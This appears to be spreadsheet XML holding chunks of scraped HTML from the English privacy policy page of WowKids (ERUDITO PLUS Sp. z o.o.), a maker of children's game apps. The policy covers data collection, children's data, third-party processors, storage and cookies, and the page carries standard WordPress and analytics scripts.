			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/eruditoplus.com\/lib\/js\/wp-emoji-release.min.js?ver=4.9.13"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px</t>
  </si>
  <si>
    <t>Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&amp;&amp;(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var 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 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t>
  </si>
  <si>
    <t>important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://eruditoplus.com/core/modules/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wooow-style-css'  href='https://eruditoplus.com/core/assets/wooow/style.css?ver=4.9.13' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wooow-main-style-css'  href='https://eruditoplus.com/core/assets/wooow/dist/css/main.min.css?ver=20151215' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-notice-front-css'  href='https://eruditoplus.com/core/modules/cookie-notice/includes/../css/front.min.css?ver=4.9.13' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/lib/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/lib/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var cnArgs = {"ajaxUrl":"https:\/\/eruditoplus.com\/insidemysite\/admin-ajax.php","nonce":"f3ad0741ea","hideEffect":"fade","position":"bottom","onScroll":"0","onScrollOffset":"100","onClick":"0","cookieName":"cookie_notice_accepted","cookieTime":"2592000","cookieTimeRejected":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"0","cache":"1","refuse":"0","revokeCookies":"0","revokeCookiesOpt":"automatic","secure":"1"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/core/modules/cookie-notice/includes/../js/front.min.js?ver=2.0.3'&gt;&lt;/script&gt;
&lt;link rel='https://api.w.org/' href='https://eruditoplus.com/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://eruditoplus.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://eruditoplus.com/lib/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.9.13" /&gt;
&lt;link rel='shortlink' href='https://eruditoplus.com/?p=173' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://eruditoplus.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feruditoplus.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://eruditoplus.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feruditoplus.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style type="text/css"&gt;
.qtranxs_flag_ru {background-image: url(https://eruditoplus.com/core/modules/qtranslate-x/flags/ru.png); background-repeat: no-repeat;}
.qtranxs_flag_en</t>
  </si>
  <si>
    <t>{background-image: url(https://eruditoplus.com/core/modules/qtranslate-x/flags/gb.png); background-repeat: no-repeat;}
&lt;/style&gt;
&lt;link hreflang="ru" href="https://eruditoplus.com/ru/privacy-policy/" rel="alternate" /&gt;
&lt;link hreflang="en" href="https://eruditoplus.com/en/privacy-policy/" rel="alternate" /&gt;
&lt;link hreflang="x-default" href="https://eruditoplus.com/privacy-policy/" rel="alternate" /&gt;
&lt;meta name="generator" content="qTranslate-X 3.4.6.8" /&gt;
	&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-132481909-1"&gt;&lt;/script&gt;
&lt;script&gt;
   window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-132481909-1');
&lt;/script&gt;	&lt;meta name="yandex-verification" content="95ded4eb65bca1bf" /&gt;
    &lt;!-- Facebook Pixel Code --&gt;
    &lt;script&gt;
      ! function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      </t>
  </si>
  <si>
    <t xml:space="preserve">n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '560642504749138');
      fbq('track', 'PageView');
    &lt;/script&gt;
    &lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=560642504749138&amp;ev=PageView&amp;noscript=1"
    /&gt;&lt;/noscript&gt;
    &lt;!-- End Facebook Pixel Code --&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-173 cookies-not-set"&gt;
&lt;header&gt;
    &lt;div class="container"&gt;
        &lt;div class="row middle-sm between-xs"&gt;
            &lt;div class="col-sm-2 col-xs-8"&gt;
                &lt;a class="image-logo" href="https://eruditoplus.com"&gt;
                    &lt;img src="https://eruditoplus.com/core/assets/wooow/dist/img/logo.svg" alt=""&gt;
                &lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="col-sm-8 col-md-7"&gt;
                &lt;nav&gt;
                    &lt;ul class="main-menu"&gt;
                        &lt;li class="menu-item active"&gt;
                            &lt;a class="anchor" href="#"&gt;Главная&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#games"&gt;Игры&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#reviews"&gt;Отзывы&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#contact"&gt;Контакты&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="m-menu-item language-switcher"&gt;
                            &lt;a href="https://eruditoplus.com/?lang=ru" class="active"&gt;RU&lt;/a&gt;
                            &lt;a href="https://eruditoplus.com/?lang=en" class=""&gt;EN&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;div class="col-md-6 social-panel m-menu-item"&gt;
	                        	                        	                        	                        	                        	                                                &lt;/div&gt;
                        &lt;!-- &lt;button class="menu-close m-menu-item"&gt;&amp;times;&lt;/button&gt; --&gt;
                    &lt;/ul&gt;
                &lt;/nav&gt;
            </t>
  </si>
  <si>
    <t>&lt;/div&gt;
            &lt;div class="col-md-3 m-hide nowrap"&gt;
                &lt;div class="box"&gt;
                    &lt;div class="row end-sm"&gt;
                        &lt;div class="col-md-6 col-sm-12 language-switcher"&gt;
                            &lt;a href="https://eruditoplus.com/?lang=ru" class="active"&gt;RU&lt;/a&gt;
                            &lt;a href="https://eruditoplus.com/?lang=en" class=""&gt;EN&lt;/a&gt;
                        &lt;/div&gt;
                        &lt;div class="col-md-6 social-panel d-visible"&gt;
	                        	                        	                        	                        	                        	                                                &lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;button id="menu-toggle" class="menu-toggle"&gt;
        &lt;img src="https://eruditoplus.com/core/assets/wooow/dist/img/sandwich.svg" alt="image for button"&gt;
    &lt;/button&gt;
&lt;/header&gt;    &lt;section class="container"&gt;
        &lt;div class="card pad-30"&gt;
                            &lt;h2&gt;Политика приватности&lt;/h2&gt;
                &lt;p&gt;&lt;b&gt;Privacy policy&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;(updated version published in May 2021)&lt;/p&gt;
&lt;p&gt; Hi All,&lt;/p&gt;
&lt;p&gt;We, &amp;#171;ERUDITO PLUS&amp;#187; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#171;Wow Kids&amp;#187;), have prepared this Privacy Policy (the “Policy”) to show how responsibly and seriously we treat the privacy of information, including personal data, of our applications users and visitors of http://eruditoplus.com (the “website”).&lt;/p&gt;
&lt;p&gt; This Policy will help you understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– what is personal data;&lt;/li&gt;
&lt;li aria-level="1"&gt;– what personal data we collect;&lt;/li&gt;
&lt;li aria-level="1"&gt;– how and why we collect it;&lt;/li&gt;
&lt;li aria-level="1"&gt;– whom we can share personal data with;&lt;/li&gt;
&lt;li aria-level="1"&gt;– how to contact us if you have any questions regarding personal data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Personal data protection statement&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;We strive to protect the privacy of personal data that we obtain and process.</t>
  </si>
  <si>
    <t>During data processing, the Company undertakes to take all necessary technical and regulatory action in strict compliance with applicable law and solely upon legal grounds permitting any such processing.&lt;/p&gt;
&lt;p&gt;All our applications and services that are available for use on mobile devices, personal computers, or any other platforms including the website, to the extent related to personal data processing and protection are governed by this Privacy Policy. Therefore, by using any of our applications and/or services you agree with this Policy.&lt;/p&gt;
&lt;p&gt;If you do not want us to collect and process information about you in accordance with this Policy, you may not, unfortunately, use our applications and/or services.&lt;/p&gt;
&lt;p&gt;When we control data collection methods and identify the goals for which such data is used, the Company becomes the “data controller” for the purposes of the EU General Data Protection Regulation (the “GDPR”), the UK Data Protection Act 2018, and any other European data protection legislation. Under the Law of Ukraine on Personal Data Protection of June 1, 2010, the Company is the “personal data owner”.</t>
  </si>
  <si>
    <t>We may also be the “data operator” under the 1998 Children’s Online Privacy Protection Rule (the “COPPA”).&lt;/p&gt;
&lt;p&gt;We process personal data only upon at least one of the following legitimate grounds for such processing, including but not limited to:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– you consented to your data processing;&lt;/li&gt;
&lt;li aria-level="1"&gt;– processing is required to execute or fulfil an agreement with you (including any offer and acceptance), including when you are using our applications / services;&lt;/li&gt;
&lt;li aria-level="1"&gt;– such processing is required under the legislation of the countries to which we provide our services or make our applications / services available;&lt;/li&gt;
&lt;li aria-level="1"&gt;– processing is required for the purposes of any legitimate interests of the Company as the controller or third party (unless where interests pertaining to fundamental rights and freedoms of the data subject that require data protection prevail over the above interests).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the same time, please note that we do not request special categories of personal data of our users / visitors.&lt;/p&gt;
&lt;p&gt;Please note that our Privacy Policy may be updated from time to time, including if required by applicable law. We suggest that you might want to review this Policy from time to time to see if there are any modifications. Your continued use of the applications or services after this Policy has been updated means your consent to such update.</t>
  </si>
  <si>
    <t>If you do not agree to the updates, you may refuse to use our applications / services (in particular, by removing the applications from your devices).&lt;/p&gt;
&lt;p&gt; Anyway, you can always delete or re-install an application on your mobile device to delete or change the personal data accordingly.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;How we obtain personal data&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;The Company may obtain your data from various sources and with various aims, including, without limitation:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– when you play our games or use other services in applications or on the website;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you make a purchase through our applications (such as a PRO plan of an application or certain game characters);&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you create an account on our website;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you watch ads in our applications;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you subscribe to our promotional mailing;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you contact our user support centre;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you talk to other users of our applications in a special chat;&lt;/li&gt;
&lt;li aria-level="1"&gt;– when you apply for a job (send your CV using any communication channel).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our applications can gather information based on the analysis of actions taken during their use.&lt;/p&gt;
&lt;h4&gt; What personal data we collect and process&lt;/h4&gt;
&lt;p&gt;(A)</t>
  </si>
  <si>
    <t>The following information about you can be collected and processed by our applications and/or services used by you, including the website:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– geo location (country, state or region, GPS location);&lt;/li&gt;
&lt;li aria-level="1"&gt;– device information (such as device name / model, operating system, browser information, including browser type and language settings);&lt;/li&gt;
&lt;li aria-level="1"&gt;– device IDs and advertisement ID (if authorised by the user);&lt;/li&gt;
&lt;li aria-level="1"&gt;– game progress and activities (such as remembering the language selected by the user and level of difficulty at a certain stage of use);&lt;/li&gt;
&lt;li aria-level="1"&gt;– Information that we collect using cookies and similar technologies (please read our separate Cookie Policy).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(B) The following information can be provided by you to use or our partners (third parties) during the use of our applications, services, and website:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– age;&lt;/li&gt;
&lt;li aria-level="1"&gt;– name;&lt;/li&gt;
&lt;li aria-level="1"&gt;– contact details (such as email or phone number);&lt;/li&gt;
&lt;li aria-level="1"&gt;– images / photos;&lt;/li&gt;
&lt;li aria-level="1"&gt;– social media profiles;&lt;/li&gt;
&lt;li aria-level="1"&gt;– bank / credit card details;&lt;/li&gt;
&lt;li aria-level="1"&gt;– work experience and skills (CV).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(C) In addition to the above, we can also process other personal data, if you voluntarily submit it to the Company.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>However, if data processing is not required for using our applications and/or services by you, or is not explicitly required by law, we will delete it.&lt;/p&gt;
&lt;h4&gt;Children’s data&lt;/h4&gt;
&lt;p&gt;We treat a user / customer as a child if they are under 13 years of age, unless different age limitations apply in their country (in certain countries these are individuals under 16).&lt;/p&gt;
&lt;p&gt; We do not intentionally collect and process children’s personal data. However, the Company understands that the target audience of our applications may include children, and that among its users there are probably parents with children who might be ordering services for children (such as buying a PRO plan or characters in the application).&lt;/p&gt;
&lt;p&gt;Parents or any other legitimate representatives who order the relevant services for children have to accept the terms of use of the relevant application and/or service of the Company and this Policy, and will be responsible for the accuracy of the data submitted and provision of the relevant service to the child.&lt;/p&gt;
&lt;p&gt;Acceptance of the terms of use and this Policy and continued use of any of our applications or services means that parents or any other legitimate representatives who order the relevant services for children understand that the personal data referred to in this Policy may be collected and processed, and have consented to this.&lt;/p&gt;
&lt;p&gt;When ordering a service or downloading an application for further use, the person who takes the relevant action is representing the legitimate interests of the child and is personally responsible for the child’s actions with this service and/or application in future.&lt;/p&gt;
&lt;p&gt;Children must not disclose their real name, location, phone number or email address, or any other personal data without prior consent of their parents or any other legitimate representatives.&lt;/p&gt;
&lt;p&gt;We do not encourage children to participate in a game by using our applications through offering a reward, and we do not encourage any other child’s activities that disclose more personal data of the child that actually required to use the application.&lt;/p&gt;
&lt;p&gt;Our applications and other services do not involve any direct disclosure of the child’s personal data to any third parties.&lt;/p&gt;
&lt;p&gt;Please refer to the relevant sections of this Policy below to learn what third parties may get information about users and for what purposes.&lt;/p&gt;
&lt;h4&gt;Purposes of personal data processing&lt;/h4&gt;
&lt;p&gt;The Company provides services and makes its applications available almost worldwide.</t>
  </si>
  <si>
    <t>We use the collected information about users / customers mostly to ensure the appropriate quality of our services, in particular, to enhance your gaming experience and improve functions and capabilities of our applications in future. We may analyse information related to the use of applications in order to adapt the user tasks so that they would better suit the user’s needs.&lt;/p&gt;
&lt;p&gt; We also use personal data for the following purposes:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– offering you a full scope of our services;&lt;/li&gt;
&lt;li aria-level="1"&gt;– control of age restrictions that meet the legislation of your country of residence;&lt;/li&gt;
&lt;li aria-level="1"&gt;– buying a PRO plan or specific game characters in applications;&lt;/li&gt;
&lt;li aria-level="1"&gt;– personalisation of user experience to provide special offers customized just for you;&lt;/li&gt;
&lt;li aria-level="1"&gt;– content personalisation;&lt;/li&gt;
&lt;li aria-level="1"&gt;– bug finding and fixing;&lt;/li&gt;
&lt;li aria-level="1"&gt;– advisory assistance to users;&lt;/li&gt;
&lt;li aria-level="1"&gt;– use for administrative, analytical and statistic purposes;&lt;/li&gt;
&lt;li aria-level="1"&gt;– ensuring and promoting communication between users;&lt;/li&gt;
&lt;li aria-level="1"&gt;– providing promotional / marketing information, including joint special offers of the Company and our partners;&lt;/li&gt;
&lt;li aria-level="1"&gt;– advertising / direct marketing and efficiency assessment;&lt;/li&gt;
&lt;li aria-level="1"&gt;– subscription management and unsubscribing;&lt;/li&gt;
&lt;li aria-level="1"&gt;– protection against any malicious actions of users and in connection with other security considerations of the Company;&lt;/li&gt;
&lt;li aria-level="1"&gt;– safeguarding of the Company’s legitimate interests;&lt;/li&gt;
&lt;li aria-level="1"&gt;– compliance with other legislative requirements, including to provide timely feedback to requests of data subjects and supervisory / law enforcement authorities.&lt;/li&gt;
&lt;li aria-level="1"&gt;– selection of candidates for a job and employment with the Company.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please understand that we have to display ads in our applications, including third party ads, to raise funding for development, distribution and technical support of our applications, most of which are free.</t>
  </si>
  <si>
    <t>For example, you might see third party advertisements while using our application.&lt;/p&gt;
&lt;p&gt;Emailing any advertising / marketing notifications to you requires your specific consent that may be revoked at any time (including by contacting the data protection officer).&lt;/p&gt;
&lt;p&gt;Please only disclose the personal data that is required to provide the selected service, mailing or response to your specific request / claim. If you decide to disclose your additional personal data with use, we will ensure that it is processed with an appropriate level of security.&lt;/p&gt;
&lt;p&gt;In-app purchasing&lt;/p&gt;
&lt;p&gt;Some of our applications have in-app purchasing function (PRO plan or specific gaming characters).&lt;/p&gt;
&lt;p&gt;Please note that all in-app purchases are processed by an external payment processor that may collect information directly from you. In particular, the payment processor may request the payer’s address and bank or credit card details in accordance with its own privacy policy (please review it before submitting such data to any external processor).&lt;/p&gt;
&lt;p&gt;External payment processors do not share the information provided by you, and we do not have credit card details.</t>
  </si>
  <si>
    <t>However, we receive a summary about all purchases made, including the transaction amount, which is necessary to give access to your purchase in the application.&lt;/p&gt;
&lt;h4&gt;Storage of personal data&lt;/h4&gt;
&lt;p&gt;We use cloud services of Google LLC (Google Ireland Limited, Gordon House, Barrow Street, Dublin 4) to ensure the security of personal data.&lt;/p&gt;
&lt;p&gt;Personal data is stored at data centres in Europe (Europe-West1, Rue de Ghlin 100, 7331 Saint-Ghislain, Belgium; Europe-West4, Oostpolder 4, 9979 XT Eemshaven, Netherlands) and United States (US-Central-1, 1430 Veterans Memorial Hwy, Council Bluffs, IA 51501; US-Central-2, 4111 N E 1st St, Pryor, OK 74361).&lt;/p&gt;
&lt;h4&gt;Personal data disclosures&lt;/h4&gt;
&lt;p&gt; We may, and in certain cases must, disclose personal data to third parties to ensure your use of our applications and/or other services.</t>
  </si>
  <si>
    <t>The reason is that we use services of other companies – our partners that have limited access to certain information about users for purposes like administration, optimisation, marketing, support, sales, and payment processing.&lt;/p&gt;
&lt;p&gt;Information received by the Company may also be shared with our counterparts whose services are used to improve the user experience and for the purposes described herein above, depending on the vendor.&lt;/p&gt;
&lt;p&gt;If you decide to use, while using our applications, such social media features as “like” (e.g. on Facebook), this will automatically enable data sharing between us and the relevant social platform.&lt;/p&gt;
&lt;p&gt;We work with the following service providers:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– Google Cloud (Google LLC): server infrastructure, big data;&lt;/li&gt;
&lt;li aria-level="1"&gt;– Google Marketing Platform (Google LLC): composite analytic tools, marketing tools;&lt;/li&gt;
&lt;li aria-level="1"&gt;– Google Firebase (Google LLC): analytical tools, consolidated bug and failure reports, push notification tool, remote configuration tool;&lt;/li&gt;
&lt;li aria-level="1"&gt;– OVHcloud (OVH Hosting Ltd): downloadable content;&lt;/li&gt;
&lt;li aria-level="1"&gt;– Unity (Unity Technologies): analytical tools, remote configuration tool.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each of these service providers does not aim to collect information about the specific user through our application, and implements and adheres to its own privacy policy that is in compliance with applicable regulations, including the GDPR. If you want to learn more about the rules of data processing by our counterparts, please read their respective privacy policies.&lt;/p&gt;
&lt;p&gt; At the same time, we may disclose user’s data to third parties, including any governmental agencies, if we are confident that this information is required for the following purposes:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– legitimate demand / request of a governmental agency (e.g. in court proceedings);&lt;/li&gt;
&lt;li aria-level="1"&gt;– revealing, investigation and/or prevention of fraud by users or any third parties;&lt;/li&gt;
&lt;li aria-level="1"&gt;– safeguarding of rights, property and/or security of the Company to the extent permitted by law.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Technical, administration and other data protection means&lt;/h4&gt;
&lt;p&gt;To ensure the secure storage of your personal data, we have implemented a number of technical and administration tools that protect personal data against any unauthorised or unlawful processing and against any unintentional data loss, destruction or damage.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Company adheres the principle of data minimization. We process only the information related to our users / customers / clients that we need to perform certain functions and for specific purposes, or the information that you (upon your own consent) share with use beyond the scope of the necessary processing (such as when you send us your CV).&lt;/p&gt;
&lt;p&gt;We have set up all interfaces of our website and applications to provide services in a way that would ensure the best possible privacy.&lt;/p&gt;
&lt;p&gt;When we share any data with our partners, we always use the most safe and secure data communication channels.&lt;/p&gt;
&lt;p&gt; In compliance with the GDPR, the Company provides relevant protection for data disclosure to countries outside the European Economic Area or Switzerland based on standard terms and conditions approved by the European Commission, or any other applicable provisions referred to in Article 46 of the GDPR.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>However, we cannot guarantee the security of your data in case of any unauthorized access to your devices that are outside of your control, and, accordingly, the Company will not be liable for this.&lt;/p&gt;
&lt;p&gt;Duration of data processing / storage&lt;/p&gt;
&lt;p&gt;We will not keep your data longer that is necessary to achieve the purpose for which it is collected and processed, or to comply with regulatory requirements.&lt;/p&gt;
&lt;p&gt; In order to identify the relevant storage period, we identify the nature and category of the personal data, purposes of processing, and whether we can hit those purposes otherwise.&lt;/p&gt;
&lt;p&gt;As a general rule, the maximum duration of personal data processing by the Company is three (3) years after such data was received, but anyway as long as the user / customer is using our application or any other service.&lt;/p&gt;
&lt;p&gt; However, regulations of other countries may impose additional requirements, so data storage period may vary.</t>
  </si>
  <si>
    <t xml:space="preserve">In particular, if regulations of the country where our application / service user resides contains the limitation of action provisions defining the period during which you may file your claim or complaint against us, and we, accordingly, need relevant proof of legal relations with you, we may process your personal data during this limitation of action period.&lt;/p&gt;
&lt;p&gt; We also need to consider any periods when we might need to keep your personal data for complying with our legal commitments to you or supervisory authorities.&lt;/p&gt;
&lt;p&gt;Over the time, we might minimize your personal data that we use, or can even make them anonymous so that they are no longer related to you personally. In this case, we can use this information without further notice as it no longer contains any personal data.&lt;/p&gt;
&lt;p&gt;Cookies and other tracking technologies&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;Cookies are small text files that are placed on your device such as computer or mobile device by websites that you visit. The website will, for a certain period of time, remember your preferences and actions, so that you will not have to set them up again. Our cookies do not identify a specific user and only identify the device that is being used.&lt;/p&gt;
&lt;p&gt;Cookies and other tracking technologies on our website and in our applications may be used in various ways, such as website operation, traffic tracking, or for advertising.</t>
  </si>
  <si>
    <t>In particular, we use cookies and other tracking technologies to improve the quality and efficiency of our services.&lt;/p&gt;
&lt;p&gt;List of cookies and other tracking technologies used by the Company on its website is available in a separate Cookie Policy.&lt;/p&gt;
&lt;p&gt;To learn more about what are cookies, how they work, how to manage or delete them, please visit &lt;a href="http://www.allaboutcookies.org" target="_blank" rel="noopener"&gt;&lt;span style="color: #0000ff;"&gt;www.allaboutcookies.org&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Please note that setting of certain browsers allow prohibiting cookies and other tracking technologies. Please be aware that switching some cookies off will result into loss of functionality of our website or application, and, accordingly, you will not be able to use all of their options, and some features / services might not be working correctly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;i&gt;Rights of personal data subjects under the GDPR&lt;/i&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Please be advised that when you contact us you have through the identification process and submit your specific requirements, so that we can process your request and provide a response on legitimate gr</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en-US" prefix="og: http://ogp.me/ns#"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
    &lt;meta property="og:image" content="https://eruditoplus.com/core/assets/wooow/dist/img/logo.svg"&gt;
    &lt;!-- Favicons --&gt;
    &lt;link rel="icon" type="image/png" href="https://eruditoplus.com/core/assets/wooow/dist/img/favicon/favicon.ico"&gt;
    &lt;!-- Fonts --&gt;
    &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>iOS Safari --&gt;
    &lt;meta name="apple-mobile-web-app-status-bar-style" content="#6ad2e5"&gt;
	&lt;title&gt;Privacy Policy &amp;ndash; WowKids&lt;/title&gt;
&lt;!-- This site is optimized with the Yoast SEO plugin v9.4 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;link rel="canonical" href="https://eruditoplus.com/en/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy Policy &amp;ndash; WowKids" /&gt;
&lt;meta property="og:description" content="Privacy policy (updated version published in May 2021) Hi All, We, &amp;#8220;ERUDITO PLUS&amp;#8221; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#8220;Wow Kids&amp;#8221;), have prepared this Privacy Policy &amp;hellip;" /&gt;
&lt;meta property="og:url" content="https://eruditoplus.com/en/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="WowKids" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/wooowkids" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:description" content="Privacy policy (updated version published in May 2021)</t>
  </si>
  <si>
    <t>Hi All, We, &amp;#8220;ERUDITO PLUS&amp;#8221; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#8220;Wow Kids&amp;#8221;), have prepared this Privacy Policy [&amp;hellip;]" /&gt;
&lt;meta name="twitter:title" content="Privacy Policy &amp;ndash; WowKids" /&gt;
&lt;script type='application/ld+json'&gt;{"@context":"https://schema.org","@type":"Organization","url":"https://eruditoplus.com/en/","sameAs":["https://www.facebook.com/wooowkids","https://www.instagram.com/wooowkids/","https://www.linkedin.com/company/wowkids","https://www.youtube.com/user/DevMageApp"],"@id":"https://eruditoplus.com/en/#organization","name":"WowKids","logo":"http://wowkids.io/wp-content/uploads/2019/01/logo.svg-2019-01-15-18-07-57.png"}&lt;/script&gt;
&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="WowKids &amp;raquo; Feed" href="https://eruditoplus.com/en/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/eruditoplus.com\/lib\/js\/wp-emoji-release.min.js?ver=4.9.13"}};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b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var</t>
  </si>
  <si>
    <t>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 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&lt;style type="text/css"&gt;
img.wp-smiley,
img.emoji {
	display: inline ! important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://eruditoplus.com/core/modules/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /&gt;
